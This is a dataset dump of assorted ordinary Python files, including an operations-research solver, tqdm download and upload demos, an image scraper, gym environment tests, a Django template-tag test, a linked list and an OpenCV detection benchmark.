blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
136a506b41edb36a805ed803e243f6ed4c0fb81b | Python | adityakangune/HackerRank-Problem-Solving | /Problem Solving/Algorithms/Implementation/Equalize the Array.py | UTF-8 | 224 | 3.140625 | 3 | [] | no_license | n = int(input())
ar = list(map(int, input().split()))
# Deletions needed to equalize the array = total length minus the
# multiplicity of the most frequent value.  Counter tallies every value in
# one O(n) pass; the original called ar.count(i) per element (O(n^2)) and
# shadowed the builtin name `dict`.
from collections import Counter
print(len(ar) - max(Counter(ar).values()))
| true |
fada82d136481b5632442512d3a6c09638432151 | Python | suetokimaki/python | /Operations Research/transportation_problem_min.py | UTF-8 | 1,311 | 3.390625 | 3 | [] | no_license | # 解运输问题最优最小运费,产销平衡
import pulp
import numpy as np
from pprint import pprint
def transportation_problem(costs, x_max, y_max):
    # Solve a balanced transportation problem (total supply == total demand)
    # as an integer program minimizing total shipping cost.
    #   costs: 2-D numpy array, costs[i][j] = unit cost from source i to sink j
    #   x_max: amount produced at each source (row sums must equal these)
    #   y_max: amount demanded at each sink (column sums must equal these)
    # Returns {'objective': minimal cost, 'var': shipped quantity matrix}.
    row = len(costs)
    col = len(costs[0])
    prob = pulp.LpProblem('Transportation Problem', sense=pulp.LpMinimize)  # build the model
    var = [[pulp.LpVariable(f'x{i}{j}', lowBound=0, cat=pulp.LpInteger)  # decision variables: units shipped i -> j
            for j in range(col)] for i in range(row)]
    # Recursively flatten the nested list of LpVariables into a flat list.
    def flatten(x): return [y for l in x for y in flatten(
        l)] if type(x) is list else [x]
    prob += pulp.lpDot(flatten(var), costs.flatten())  # objective: total shipping cost
    for i in range(row):
        prob += (pulp.lpSum([var[i][j] for j in range(col)]) == x_max[i])  # supply constraints (production fully shipped)
    for j in range(col):
        prob += (pulp.lpSum([var[i][j] for i in range(row)]) == y_max[j])  # demand constraints (demand fully met)
    prob.solve()
    print(prob)
    return {'objective': pulp.value(prob.objective), 'var': [[pulp.value(var[i][j]) for j in range(col)] for i in range(row)]}
if __name__ == '__main__':
    # Unit shipping costs: 2 supply rows x 3 demand columns.
    costs = np.array([[90, 70, 100],
                      [80, 65, 80]])
    max_chan = [200, 250]       # supply at each source
    max_xiao = [100, 150, 200]  # demand at each destination
    res = transportation_problem(costs, max_chan, max_xiao)
    print(f'min={res["objective"]}')
    print('value:')
    pprint(res['var'])
| true |
69116f0a8dc6704cb13a26eaa5b5bbd39b181628 | Python | ysoftman/test_code | /python/progress_bar_tqdm.py | UTF-8 | 5,052 | 2.703125 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
# author: ysoftman
# python version : 3.x
# desc : tqdm progress bar test
# tqdm
# https://github.com/tqdm/tqdm
# pip install tqdm aiofiles aiohttp
from tqdm import tqdm
import requests, time, os
import asyncio, aiofiles, aiohttp
def sample():
    """Demonstrate three basic tqdm usages: a list, a range, and a manual handle."""
    for item in tqdm(["a", "b", "c", "d"]):
        time.sleep(0.2)
    for _ in tqdm(range(10)):
        time.sleep(0.1)
    progress = tqdm(["a", "b", "c", "d"])
    for item in progress:
        time.sleep(0.2)
        # Show which item is being processed to the left of the bar.
        progress.set_description(f"Processing {item}")
def download_test(url):
    """Download *url* with a tqdm progress bar driven by Content-Length.

    Fix: the original raised NameError when neither the HEAD nor the GET
    response carried a Content-Length header; we now fall back to an
    indeterminate bar (total=None) in that case.
    """
    content_length = None  # stays None when the server never reports a size
    # Probe the total size first.
    response = requests.head(url)
    # print(response.headers)
    if response.headers.get("Content-Length") is None:
        print(f"[HEAD] can't find Content-Length header")
    else:
        content_length = int(response.headers.get("Content-Length"))
        print(f"[HEAD] Content-Length:{content_length}")
    response = requests.get(url, stream=True)
    if response.headers.get("Content-Length") is None:
        print(f"[GET] can't find Content-Length header")
    else:
        content_length = int(response.headers.get("Content-Length"))
        print(f"[GET] Content-Length:{content_length}")
    # unit="B" with unit_scale lets tqdm auto-scale to KB/MB;
    # mininterval throttles redraws.
    pbar = tqdm(
        unit="B",
        unit_scale=True,
        total=content_length,
        desc="[download]" + url,
        mininterval=0.1,
    )
    # iter_content() walks the response body chunk by chunk
    # (requires stream=True on the GET above).
    received = 0
    for chunk in response.iter_content(chunk_size=1024 * 100):
        # Never push the bar past the declared total, or tqdm clears it.
        if content_length is None or received + len(chunk) <= content_length:
            pbar.update(len(chunk))
            received += len(chunk)
    if content_length is not None:
        # Top the bar up to exactly 100% (some chunks may have been skipped).
        pbar.update(content_length - received)
async def read_file(filename):
    """Async generator yielding *filename* in ~1% chunks while updating a tqdm bar.

    Fix: the original used int(file_size / 100) as the chunk size, which is 0
    for files smaller than 100 bytes and then loops forever reading nothing.
    """
    file_size = os.path.getsize(filename)
    # unit="B" + unit_scale: auto-scale byte counts; mininterval throttles redraws.
    pbar = tqdm(
        unit="B",
        unit_scale=True,
        total=file_size,
        desc="[upload]" + filename,
        mininterval=0.1,
    )
    chunk_size = max(1, file_size // 100)  # never 0: guarantees forward progress
    read_chunk_size = 0
    async with aiofiles.open(filename, "rb") as f:
        while read_chunk_size < file_size:
            chunk = await f.read(chunk_size)
            # Hand the data just read to the consumer (streaming upload body).
            yield chunk
            read_chunk_size += len(chunk)
            pbar.update(len(chunk))
# aiohttp.ClientSession
# <https://docs.aiohttp.org/en/stable/client_quickstart.html>
# <https://docs.aiohttp.org/en/stable/client_quickstart.html#streaming-uploads>
async def upload_test(aiohttpSession, url, filename):
    # Streaming PUT of *filename* to *url* over the given session.
    # Returns the aiohttp response, or None (after printing) on any error.
    try:
        basic_auth = aiohttp.BasicAuth(login="ysoftman", password="test123")
        # Default timeout is 300 seconds (5 min); total=None (or 0) disables it.
        # https://github.com/aio-libs/aiohttp/pull/5529/files
        timeout = aiohttp.ClientTimeout(total=None)
        # set header below to fix a hang problem with the wsgidav server (https://github.com/mar10/wsgidav)
        # https://yoonbh2714.blogspot.com/2022/07/webdav-chunked-size.html
        # headers = {}
        # headers["X_EXPECTED_ENTITY_LENGTH"] = repr(os.fstat(fileobj.fileno()).st_size) # fileobject case
        # headers["X_EXPECTED_ENTITY_LENGTH"] = repr(os.path.getsize(filename))
        # headers["User-Agent"] = "Darwin"
        # async for d in read_file(filename):
        #     print(d)
        # Send exactly the chunks produced by read_file as the request body.
        async with aiohttpSession.put(
            url=url, auth=basic_auth, timeout=timeout, data=read_file(filename)
        ) as res:
            return res
    except Exception as e:
        print(e)
async def upload_main():
    """Upload the test file three times over one shared ClientSession.

    Fix: the original created an extra ClientSession before the ``async with``
    block and immediately shadowed it, leaking an unclosed session.
    """
    # The session is created once and reused until upload_main() returns.
    async with aiohttp.ClientSession() as aiohttpSession:
        # Upload the file, reading it chunk by chunk asynchronously.
        for i in range(3):
            await upload_test(
                aiohttpSession, "https://httpbin.org/put", "ysoftman_10MB"
            )
if __name__ == "__main__":
    sample()
    download_test("https://www.youtube.com")
    # Create a 10 MB dummy file for the upload test.
    os.system("dd if=/dev/urandom of=ysoftman_10MB bs=1024*1024 count=10")
    # The following two lines can be replaced by asyncio.run():
    # loop = asyncio.get_event_loop()
    # loop.run_until_complete(upload_main())
    asyncio.run(upload_main())
    os.remove("ysoftman_10MB")
| true |
f624d5591e770d2f13f73a556da895ca4dc29c91 | Python | BLOODMAGEBURT/spiderdemo | /huaban.py | UTF-8 | 785 | 2.609375 | 3 | [] | no_license | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import json
from contextlib import closing
# Fetch the first 20 photos of an Unsplash collection through its private API.
# NOTE(review): verify=False disables TLS certificate checking — tolerable for
# a throwaway scraper, not for anything handling sensitive data.
chapters = requests.get(url='https://unsplash.com/napi/collections/'
                            '1065976/photos?page=1&per_page=20&order_by=latest', verify=False)
# print(chapters.text)
json_res = json.loads(chapters.text)  # list of photo objects
print('开始下载了……')
for url in json_res:
    # Each entry carries an id and a direct download link.
    src_id = url['id']
    download_url = url['links']['download'] + '?force=true'
    # closing() guarantees the streamed response is released.
    with closing(requests.get(url=download_url, verify=False, stream=True)) as res:
        with open('%s.jpg' % src_id, 'wb') as fd:
            print('下载新的……')
            for chunk in res.iter_content(chunk_size=1024):
                if chunk:  # skip keep-alive chunks
                    fd.write(chunk)
print('下载完了……')
| true |
36685cfbc969d7845effb218aca979f4e65ee912 | Python | hex-plex/KiloBot-MultiAgent-RL | /env_test.py | UTF-8 | 3,401 | 2.53125 | 3 | [
"MIT"
] | permissive | import gym
import gym_kiloBot
import time
import cv2
import numpy as np
def test1():
    # Runs the environment headless (render=False) and shows the critic-input
    # observation image with OpenCV instead of the env's own renderer.
    # NOTE(review): 'screen_heigth' matches the env's (misspelled) kwarg name.
    print("This should run the env with out any render")
    env = gym.make("kiloBot-v0", n=10, screen_width=500, screen_heigth=500, render=False)
    env.reset()
    a = env.dummy_action(0.1, 5)
    for i in range(1000):
        _, _, _, o = env.step([a] * env.n)
        out = o['critic_input']  # image observation intended for the critic
        cv2.imshow("asdf", out)
        cv2.waitKey(10)
        if i % 100 == 0:  # periodically restart the episode
            env.reset()
            time.sleep(0.05)
    # env.close()
    time.sleep(0.2)
    cv2.destroyAllWindows()
    return True
def test2():
    # Runs the environment with its own on-screen rendering enabled.
    print("This should run the env with render")
    env = gym.make("kiloBot-v0", n=10, screen_width=500, screen_heigth=500, radius=5)
    env.reset()
    a = env.dummy_action(0.1, 5)
    for i in range(1000):
        env.step([a] * env.n); env.render();
        if i % 100 == 0:  # periodic episode restart
            env.reset()
            time.sleep(0.05)
        time.sleep(0.01)
    env.reset()
    env.close()
    time.sleep(0.2)
    return True
def test3():
    # Exercises the pairwise-distance graph API and inspects the module queue.
    print("This should run the env and be able to fetch all the graphs")
    env = gym.make("kiloBot-v0", n=10, screen_width=500, screen_heigth=500, radius=5)
    env.reset()
    a = env.dummy_action(0.1, 5)
    for i in range(500):
        env.step([a] * env.n); env.render();
        env.graph_obj_distances()
        print(len(env.module_queue), "\n", env.module_queue)
        env.module_queue = []  # drain the queue between steps
        if i % 100 == 0:
            env.reset()
            time.sleep(0.05)
        time.sleep(0.05)
    env.reset()
    env.close()
    time.sleep(0.2)
    return True
def test4():
    # Checks the distance histogram produced after building the graphs.
    print("This should check for the histogram and the optimal region")
    env = gym.make("kiloBot-v0", n=10, screen_width=500, screen_heigth=500, radius=5)
    env.reset()
    a = env.dummy_action(0.1, 5)
    for i in range(500):
        env.step([a] * env.n); env.render();
        env.graph_obj_distances()
        hist = env.fetch_histogram()
        print(hist, "\n", hist.shape)
        env.module_queue = []  # drain the queue between steps
        if i % 100 == 0:
            env.reset()
            time.sleep(0.05)
        time.sleep(0.05)
    env.reset()
    env.close()
    time.sleep(0.2)
    return True
def test5():
    # Runs the "localization" objective and prints the extra info fields
    # returned at every step.
    print("This should check for the localized target with and with the critic knowing (presence in the image)")
    env = gym.make("kiloBot-v0", n=10, objective="localization", screen_width=500, screen_heigth=500, radius=5)
    env.reset()
    a = env.dummy_action(0.1, 5)
    for i in range(1000):
        observation, reward, done, info = env.step([a] * env.n); env.render();
        print(info["localization_bit"], "\n", info["target_distance"], "\n", info["neighbouring_bit"])
        if i % 100 == 0:
            env.reset()
            time.sleep(0.05)
        time.sleep(0.01)
    env.reset()
    env.close()
    time.sleep(0.2)
    return True
if __name__ == "__main__":
    # test1 (headless) is excluded: see the author's note below about mixing
    # render and non-render environments in one session.
    testes = [test2, test3, test4, test5]  ## dont have non render mode with render mode environement in the same session it causes a lot of problem
    print("I Have not completely designed the test to be user freind but just as a output of the env variable \n \t\t ^\_('_')_/^\n\n "); time.sleep(1)
    result = [0] * len(testes)
    for i, test in enumerate(testes):
        res = test()
        print("test" + str(i) + " - results " + ("Passed!" if res else "Failed!"))
        result[i] = int(res)
    print("Passed " + str(sum(result)) + "/" + str(len(testes)) + " tests !")
| true |
856144167e6319faa11f3805ba36a45c93e15e60 | Python | daniele21/DL_soccer_prediction_v2 | /core/file_manager/saving.py | UTF-8 | 676 | 2.546875 | 3 | [
"MIT"
] | permissive | import torch
import json
import pickle
from scripts.utils.utils import ensure_folder
def save_json(json_dict, filepath):
    """Serialize *json_dict* to *filepath* as pretty-printed (indent=4) JSON."""
    # The context manager closes the file; the original's explicit j.close()
    # inside the with-block was redundant.
    with open(filepath, 'w') as j:
        json.dump(json_dict, j, indent=4)
def save_str_file(content, filepath, mode='a'):
    """Write *content* to *filepath*; the default mode 'a' appends."""
    # with-block closes the file; the original's explicit close was redundant.
    with open(filepath, mode) as f:
        f.write(content)
def save_model(model, filepath):
    """Persist *model* via save_object and return the path written."""
    # print(f'> Saving model at {filepath}')
    return save_object(model, filepath)
def save_object(my_object, filepath):
    """Serialize *my_object* to *filepath* with torch.save; returns the path."""
    # print(f'> Saving object at {filepath}')
    torch.save(my_object, filepath)
    return filepath
| true |
df808b7992685446bba9adb2c1665d9ae18b0b27 | Python | SergioJune/leetcode_for_python | /binary_search/50.py | UTF-8 | 791 | 3.453125 | 3 | [] | no_license | """
实现 pow(x, n) ,即计算 x 的 n 次幂函数。
示例 1:
输入: 2.00000, 10
输出: 1024.00000
示例 2:
输入: 2.10000, 3
输出: 9.26100
示例 3:
输入: 2.00000, -2
输出: 0.25000
解释: 2-2 = 1/22 = 1/4 = 0.25
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/powx-n
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
# Iterative (non-recursive) solution.
class Solution:
    def myPow(self, x: float, n: int) -> float:
        """Compute x**n via binary (square-and-multiply) exponentiation."""
        negative = n < 0
        exponent = abs(n)
        if exponent == 0:
            return 1
        result = 1
        base = x
        while exponent:
            if exponent & 1:        # current bit set: fold this power in
                result *= base
            base *= base            # square for the next bit
            exponent >>= 1
        return 1 / result if negative else result
| true |
976bf8e97e5986652e2bb6e2da8707cd3b08e90a | Python | Aasthaengg/IBMdataset | /Python_codes/p03729/s665666994.py | UTF-8 | 106 | 3.1875 | 3 | [] | no_license | a, b, c = [i for i in input().split()]
# Word-chain rule: each word must begin with the last letter of the
# previous one.
print("YES" if a[-1] == b[0] and b[-1] == c[0] else "NO")
3e51ba721991f43bb1fa568c8400778079f1aa02 | Python | skripkar/noc | /main/tests/templatetags.py | UTF-8 | 1,624 | 2.78125 | 3 | [
"BSD-3-Clause"
] | permissive | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Template tags test
# ---------------------------------------------------------------------
# Copyright (C) 2007-2011 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Django modules
from django import template
# NOC modules
from noc.lib.test import NOCTestCase
PYTHON1_TPL = """
{% load python %}
Before:
x={{ x }}
y={{ y }}
{% python %}
context["x"] += 3
context["y"] = 2 * context["x"]
render("Python code completed")
{% endpython %}
x={{ x }}
y={{ y }}
"""
PYTHON1_OUT = """
Before:
x=1
y=
Python code completed
x=4
y=8
"""
PYTHON2_TPL = """
{% load python %}
{% python %}
for i in range(context["n"]):
rendernl("Line #%d" % i)
{% endpython %}
"""
PYTHON2_OUT = """
Line #0
Line #1
Line #2
"""
PYTHON3_TPL = """
{% load python %}
{% var v1 internal %}
v={{v}}
{% python %}
context["v1"] = 2 * context["v"] + 3
{% endpython %}
v1={{v1}}
"""
PYTHON3_OUT = """
v=2
v1=7
"""
class TemplateTestCase(NOCTestCase):
    """Render-level tests for the custom {% python %} Django template tag."""

    def render(self, tpl, context={}):
        """Render template string *tpl* with *context* and return the output."""
        # NOTE(review): mutable default argument; harmless as long as the
        # dict is only read — confirm it is never mutated downstream.
        ctx = template.Context(context)
        return template.Template(tpl).render(ctx)

    def test_python(self):
        """
        {% python %} tag test
        :return:
        """
        self.assertEquals(self.render(PYTHON1_TPL, {"x": 1}),
                          PYTHON1_OUT)
        self.assertEquals(self.render(PYTHON2_TPL, {"n": 3}),
                          PYTHON2_OUT)
        self.assertEquals(self.render(PYTHON3_TPL, {"v": 2}),
                          PYTHON3_OUT)
| true |
bf6f9e58bc4b1431756ced0bf3701c5bbb08468e | Python | spacedentist/pyimmutable | /pyimmutable/tests/test_equality.py | UTF-8 | 2,667 | 3.234375 | 3 | [
"MIT"
] | permissive | import unittest
from pyimmutable import ImmutableDict, ImmutableList
class TestEquality(unittest.TestCase):
    """Equality semantics of pyimmutable containers.

    pyimmutable distinguishes values that Python's ``==`` would treat as
    equal (e.g. int 3 vs float 3.0), while equal-valued keys of the same
    type behave as the same key even when they are distinct objects.
    """

    def test_strict_equality(self):
        """
        pyimmutable has stricter equality requirements than usual.
        """
        l1 = ImmutableList([1, 2, 3])
        l2 = ImmutableList([1, 2, 3.0])
        self.assertFalse(l1 is l2)
        self.assertNotEqual(l1, l2)
        # count()/index() honour the same strict, type-aware equality:
        # the int 3 and the float 3.0 never match each other.
        self.assertEqual(l1.count(3), 1)
        self.assertEqual(l1.count(3.0), 0)
        self.assertEqual(l2.count(3), 0)
        self.assertEqual(l2.count(3.0), 1)
        self.assertEqual(l1.index(3), 2)
        self.assertEqual(l2.index(3.0), 2)
        with self.assertRaises(ValueError):
            l1.index(3.0)
        with self.assertRaises(ValueError):
            l2.index(3)

    def test_tuple(self):
        # Two distinct tuple objects with equal contents must behave as the
        # same dict key.  Long strings make constant folding/interning unlikely.
        key1 = ("x" * 10000,)
        key2 = (("x" * 9999 + "x"),)
        self.assertTrue(type(key1) is tuple)
        self.assertTrue(type(key2) is tuple)
        self.assertEqual(key1, key2)
        if key1 is key2:
            # The interpreter produced one shared object; the test would
            # prove nothing, so skip rather than fail.
            self.skipTest(
                "failed to construct two different tuple objects "
                "with same value"
            )
        d = ImmutableDict({key1: 123})
        self.assertEqual(d.get(key1), 123)
        self.assertEqual(d.get(key2), 123)
        self.assertTrue(key1 in d)
        self.assertTrue(key2 in d)

    def test_string(self):
        # Same scheme as test_tuple, with str keys.
        key1 = "x" * 10000
        key2 = "x" * 9999 + "x"
        self.assertTrue(type(key1) is str)
        self.assertTrue(type(key2) is str)
        self.assertEqual(key1, key2)
        if key1 is key2:
            self.skipTest(
                "failed to construct two different string objects "
                "with same value"
            )
        d = ImmutableDict({key1: 123})
        self.assertEqual(d.get(key1), 123)
        self.assertEqual(d.get(key2), 123)
        self.assertTrue(key1 in d)
        self.assertTrue(key2 in d)
        # A bytes object with the same content is a *different* key.
        self.assertFalse(key1.encode("ascii") in d)

    def test_bytes(self):
        # Same scheme as test_string, with bytes keys.
        key1 = b"x" * 10000
        key2 = b"x" * 9999 + b"x"
        self.assertTrue(type(key1) is bytes)
        self.assertTrue(type(key2) is bytes)
        self.assertEqual(key1, key2)
        if key1 is key2:
            self.skipTest(
                "failed to construct two different bytes objects "
                "with same value"
            )
        d = ImmutableDict({key1: 123})
        self.assertEqual(d.get(key1), 123)
        self.assertEqual(d.get(key2), 123)
        self.assertTrue(key1 in d)
        self.assertTrue(key2 in d)
        # The decoded str form must not match a bytes key.
        self.assertFalse(key1.decode("ascii") in d)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
| true |
d202ad9bb445e46f5fe9c9267affaba8bbd61920 | Python | 276921237/CGM-UartPrintVisual | /example8_cgm.py | UTF-8 | 8,324 | 2.625 | 3 | [] | no_license | # 代码功能:
# 1.以分号为间隔,按列读取文本文件
# 2.将读取到的数据转换成int类型数据
# 3.将int类型数据以折线图形式展示出来
# 4.由于原始数据可能有大的突变不方便图形暂时,在代码中可以限制最大值,可修改 max_pdd 变量来控制最大值,
# 5.也可以设定 max_visual_value_plus , max_visual_value_minus 来控制Y轴的最大正,负显示值
# 6.数据格式如下,如果python运行报错,请检查数据格式,特别是在中途是否有打印输入:
# [12-13 16:22:07]3d87:pdd:0004,000a,0004,8006;pll:6;da:7df3
# [12-13 16:22:08]3d88:pdd:0004,000b,0004,8007;pll:6;da:7df3
# [12-13 16:22:09]3d89:pdd:0003,000a,0003,8007;pll:6;da:7df3
# [12-13 16:22:10]3d8a:pdd:0005,000b,0005,8006;pll:6;da:7df3
# [12-13 16:22:11]3d8b:pdd:0004,000b,0004,8007;pll:6;da:7df3
# [12-13 16:22:12]3d8c:pdd:0003,000b,0003,8008;pll:6;da:7df3
# [12-13 16:22:13]3d8d:pdd:0005,000b,0005,8006;pll:6;da:7df3
# [12-13 16:22:14]3d8e:pdd:0004,000b,0004,8007;pll:6;da:7df3
# [12-13 16:22:15]3d8f:pdd:0003,000b,0003,8008;pll:6;da:7df3
# [12-13 16:22:16]3d90:pdd:0005,000b,0005,8006;pll:6;da:7df3
# [12-13 16:22:17]3d91:pdd:0004,000b,0004,8007;pll:6;da:7df3
# [12-13 16:22:18]3d92:pdd:0003,000b,0003,8008;pll:6;da:7df3
# [12-13 16:22:19]3d93:pdd:0005,000b,0005,8006;pll:6;da:7df3
# [12-13 16:22:20]3d94:pdd:0004,000b,0004,8007;pll:6;da:7df3
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import datetime
import tkinter as tk
from tkinter import filedialog
# ---- Tunables -------------------------------------------------------------
# Any decoded PDD magnitude above max_pdd is clamped to max_pdd so a single
# spike cannot flatten the plots.
max_pdd = 10000
# Y-axis display limits applied to every PDD figure.
max_visual_value_plus = 200
max_visual_value_minus = -200

# ---- Input selection ------------------------------------------------------
# Pick the log file through a native file dialog (the Tk root stays hidden).
root = tk.Tk()
root.withdraw()
origin_data_file = filedialog.askopenfilename()

file_path = origin_data_file
# Each log line has three ';'-separated fields: the pdd block, pll and da.
column_names = ['index1', 'index2', 'index3']

print('%s: program start' % datetime.datetime.now())
print("open file: %s" % file_path)
data = pd.read_csv(file_path, header=None, sep=';', names=column_names)
print('%s: read csv complete' % datetime.datetime.now())


def decode_signed_hex(entries, value_slice, sign_index):
    """Decode one PDD column out of the raw 'pdd:xxxx,xxxx,xxxx,xxxx' field.

    Each value is a 4-digit hex word: the leading digit carries the sign
    ('8' or 'f' means negative) and the trailing three digits the magnitude,
    which is scaled by 8 and clamped to +/- max_pdd.

    The original script repeated this loop four times with different slice
    offsets; it is factored into one helper here.
    """
    decoded = []
    for entry in entries:
        magnitude = 8 * int(entry[value_slice], base=16)
        magnitude = min(magnitude, max_pdd)  # clamp spikes for plotting
        if entry[sign_index] in ('8', 'f'):
            decoded.append(-magnitude)
        else:
            decoded.append(magnitude)
    return decoded


# (label, slice of the 3 magnitude digits, index of the sign digit),
# addressed from the end of the 'pdd:...' field.
PDD_FIELDS = [
    ('REF_VS_LOC', slice(-18, -15), -19),
    ('4B0_VS_LOC', slice(-13, -10), -14),
    ('UBLOX_VS_LOC', slice(-8, -5), -9),
    ('4B0_VS_UBLOX', slice(-3, None), -4),
]

pdd_series = []
for idx, (label, value_slice, sign_index) in enumerate(PDD_FIELDS, start=1):
    pdd_series.append(decode_signed_hex(data.index1, value_slice, sign_index))
    print('%s: generate pdd_data%d complete' % (datetime.datetime.now(), idx))
y_pdd1_dec, y_pdd2_dec, y_pdd3_dec, y_pdd4_dec = pdd_series

# PLL: last hex digit of the 'pll:x' field.
y_pll_dec = [int(v[-1], base=16) for v in data.index2]

# DA: last four hex digits of the 'da:xxxx' field.
y_davalue_dec = [int(v[-4:], base=16) for v in data.index3]

print('%s: generate all data complete' % datetime.datetime.now())

x = np.linspace(1, len(data.index), len(data.index))

# Combined figure with all four PDD traces.
plt.figure()
plt.title("PDD VALUE FIGURE")
for (label, _, _), series in zip(PDD_FIELDS, pdd_series):
    plt.plot(x, series, label=label)
plt.legend()
plt.ylim(max_visual_value_minus, max_visual_value_plus)

# One dedicated figure per PDD trace.
for (label, _, _), series in zip(PDD_FIELDS, pdd_series):
    plt.figure()
    plt.title("%s VALUE FIGURE" % label)
    plt.plot(x, series, label=label)
    plt.legend()
    plt.ylim(max_visual_value_minus, max_visual_value_plus)

# Stacked view: PLL, DA and the REF_VS_LOC PDD trace.
plt.figure()
plt.subplot(311)
plt.plot(x, y_pll_dec, label='pll value')
plt.legend()
plt.subplot(312)
plt.plot(x, y_davalue_dec, label='da value')
plt.legend()
plt.subplot(313)
plt.plot(x, y_pdd1_dec, label='REF_VS_LOC')
plt.legend()
plt.ylim(max_visual_value_minus, max_visual_value_plus)

print('%s: generate figure complete' % datetime.datetime.now())
plt.show()
| true |
3faaa02c8d9037737c28a0e17003936c75878e45 | Python | Nyamkhuub/oop-python | /linkedlist/list.py | UTF-8 | 1,386 | 3.65625 | 4 | [] | no_license | class Node:
    def __init__(self, value):
        # Singly linked list node: stores the payload and the link to the
        # next node (None marks the tail).
        self.value = value
        self.next = None
class List:
    """Minimal singly linked list supporting add, see and remove."""

    def __init__(self, *elements):
        self.header = None
        for element in elements:
            self.add(element)

    def add(self, value):
        """Append *value* at the tail (O(n) walk from the head)."""
        node = Node(value)
        if self.header is None:
            self.header = node
            return
        tail = self.header
        while tail.next is not None:
            tail = tail.next
        tail.next = node

    def see(self):
        """Print every stored value, head to tail."""
        node = self.header
        while node is not None:
            print(node.value)
            node = node.next

    def remove(self, value):
        """Delete the first node whose value equals *value*; print the outcome."""
        prev, node = self.header, self.header
        found = False
        while node is not None:
            if node.value == value:
                if node is self.header:
                    # Removing the head: just advance the header pointer.
                    self.header = self.header.next
                else:
                    prev.next = node.next
                found = True
                break
            prev, node = node, node.next
        if found:
            print('Amjilttai ustgalaa!')
        else:
            print('tuhain haij baigaa utga listend baihgui bna')
# Quick manual smoke test of the list operations.
test = List(1, 2, 3, 4, 'ene bol test')
test.see()
test.add('testing add function')
print('-----------')
test.remove(1)
print('-----------')
test.see()
| true |
2fd11f0ace4c289c5c1d6c246dabc5465d4ea264 | Python | ikuyarihS/Charlotte | /tests/commands/top_test.py | UTF-8 | 1,279 | 2.9375 | 3 | [] | no_license | import discord
from commands import top
from collections import namedtuple
import io
# Lightweight stand-ins for the discord message/user objects used in tests.
MockMessage = namedtuple("Message", ["channel_id", "content"])
MockUser = namedtuple("User", ["count", "username"])
class MockDatabase(object):
    """Stub database returning deterministic fake users for the tests."""

    def __init__(self):
        pass

    def get_top_members_per_message_count(self, top_n):
        """Return *top_n* mock users: user ``i`` with message count ``i``."""
        return [MockUser(i, "user%d" % i) for i in range(top_n)]
def test_top_too_many_users():
    # Requesting an absurd top-N must be rejected with the canned refusal
    # message, echoed back to the originating channel.
    incoming_message = MockMessage("my_channel_id_123", "!c/top/10000")
    result = top(incoming_message, None, 10000)
    assert isinstance(result, discord.Message)
    assert result.content == "Fuck off mate, bandwidth ain't free."
    assert result.channel_id == incoming_message.channel_id
def test_top():
    # A reasonable top-N returns an empty-text message carrying the rendered
    # "top.png" chart as an in-memory attachment.
    incoming_message = MockMessage("my_channel_id_123", "!c/top/10000")
    db = MockDatabase()
    result = top(incoming_message, db, 5)
    assert isinstance(result, discord.Message)
    assert result.content == ""
    assert result.channel_id == incoming_message.channel_id
    assert result.attachment != None
    assert len(result.attachment) == 2
    assert result.attachment[0] == "top.png"
    assert isinstance(result.attachment[1], io.BytesIO)
| true |
c746b8c9dc5df301228ac2bc3cb5fa395fedf62c | Python | gabriaraujo/uri | /src/python/1013.py | UTF-8 | 161 | 3.46875 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
# Read three integers and report the largest one.
a, b, c = map(int, input().split())
# max() replaces the original build-a-list-and-sort approach and avoids
# shadowing the builtin name 'list'.
print("%d eh o maior" % max(a, b, c))
| true |
843d5c7eac9bbc8a97c0e2293da841cb40ef4f06 | Python | trickfountain/biodiv | /biodiv/validation.py | UTF-8 | 4,550 | 2.953125 | 3 | [] | no_license | import cv2 as cv
import numpy as np
from biodiv.detection import detect_ROI, V1, resize_img
from biodiv.utils import find_extContours, display
def cnts_benchmark(img_src, detector=detect_ROI):
    '''Calculate detection recall and precision for a given detector.

    Uses pure red (0, 0, 255) dots for labelling.  Input expected is a
    colour, 3-channel image where only the dots are coloured.  A detector
    is the step that takes a pre-processed image and finds Regions Of
    Interest.  The centre of each labelled dot is found via image moments
    and tested against the contour of every detected ROI.
    '''
    img = cv.imread(img_src, 1)
    _, thresh1 = cv.threshold(img, 50, 255, cv.THRESH_BINARY)
    # Red label dots survive in the red plane but not in blue, so r-b
    # isolates just the labels.
    b, _, r = cv.split(thresh1)
    targets = r-b
    t_cnts = find_extContours(targets)
    targets = []  # name reused: now the list of (id, centre) ground truths
    for i, cnt in enumerate(t_cnts):
        # Dot centroid from first-order image moments.
        M = cv.moments(cnt)
        cx, cy = int(M['m10']/M['m00']), int(M['m01']/M['m00'])
        targets.append((i, (cx, cy)))
    detected = detector(b)
    det_cnts = []
    for i, (tl, br) in enumerate(detected):
        # Draw each ROI rectangle on a blank canvas and re-extract it as a
        # contour so pointPolygonTest can be applied below.
        canvas = np.zeros(img.shape[0:2], np.uint8)
        cv.rectangle(canvas, tuple(tl), tuple(br), 255, 3)
        cnts = find_extContours(canvas)
        det_cnts.append((i, cnts[0]))
    matches = []
    for det_id, roi_cnt in det_cnts:
        for target_id, center in targets:
            # pointPolygonTest returns 1 when the point lies inside the contour.
            result = cv.pointPolygonTest(roi_cnt, center, False)
            if result == 1:
                matches.append((det_id, target_id))
    tot_matches = len(matches)
    # Unique ground-truth dots hit at least once (a dot may fall in several ROIs).
    un_matches = len(set([tup[1] for tup in matches]))
    tot_targets = len(targets)
    tot_cnts = len(det_cnts)
    recall = un_matches/len(targets)*100 if tot_matches else 0
    precision = un_matches/len(det_cnts)*100 if det_cnts else 0
    results = {
        'recall': recall,
        'precision': precision,
        'tot_matches': tot_matches,
        'un_matches': un_matches,
        'tot_targets': tot_targets,
        'tot_cnts': tot_cnts
    }
    return results
